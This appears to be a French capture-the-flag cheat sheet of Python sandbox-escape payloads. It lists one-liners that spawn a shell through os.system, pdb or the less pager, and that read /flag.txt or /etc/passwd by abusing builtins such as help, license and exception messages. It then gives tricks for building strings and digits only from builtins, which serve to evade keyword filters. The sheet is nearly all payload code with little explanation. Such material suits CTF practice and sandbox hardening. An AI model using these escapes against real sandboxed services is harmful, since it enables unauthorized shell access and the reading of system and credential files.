Bon a savoir

breakpoint() # pdb -> import os; os.system("sh")
exec(input()) # import os; os.system("sh")
eval(input()) # __import__("os").system("sh")
help() # pager less -> !/bin/sh
help() # pager less -> :e/flag.txt
assert len(set( [ *open("/flag.txt"), open("/flag.txt").read(), set(open("/flag.txt")).pop() ] )) == 1
# vers stderr
exit(set(open("/flag.txt")))
exit([*open("/flag.txt")])
compile(".","/flag.txt","exec")
raise Exception(*open("/flag.txt"))
# vers stdout
help([*open("/etc/passwd")][0]) # 1, 2, 3
print(*open("/flag.txt"))
type("", (), {"__init__": lambda s: print(open("flag.txt").read())})()
memoryview(open("flag.txt", "rb").read()).tobytes()
# vers stdin
input([*open("/etc/passwd")])
# https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help-and-license
license._Printer__filenames = ['/flag.txt']; license()
[license() for _ in [license._Printer__filenames in [['/flag.txt']]]]

Creer des chars & strings

# Normal
print("hello")
# echappements hex
print("\x68\x65\x6c\x6c\x6f")
# echappements octal
print("\150\145\154\154\157")
# points de code unicode
print("\u0068\u0065\u006c\u006c\u006f")
print("\U00000068\U00000065\U0000006c\U0000006c\U0000006f")
# Uniquement avec les builtins
print(().__doc__[56] + ().__doc__[17] + ().__doc__[3] + ().__doc__[3] + ().__doc__[34])
print(().__doc__[56].__add__(().__doc__[17].__add__(().__doc__[3].__add__(().__doc__[3].__add__(().__doc__[34])))))
print(chr(ord('ʚ')-ord('ȫ'))+chr(ord('ř')-ord('æ'))+chr(ord('ř')-ord('æ'))+chr(ord('ȉ')-ord('ơ')))

Creer des digits

print(10)
print(True + True + True + True + True + True + True + True + True + True)
print((()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())) # marche aussi avec [] & {} & ...
print(((()==())<<(()==())<<(()==())<<(()==()))|((()==())<<(()==()))) # ((1<<1<<1<<1) | (1<<1)) = 8 | 2 = 10
print(len(str(...))+str(()))
print([[]]>[])
print(not[]is[])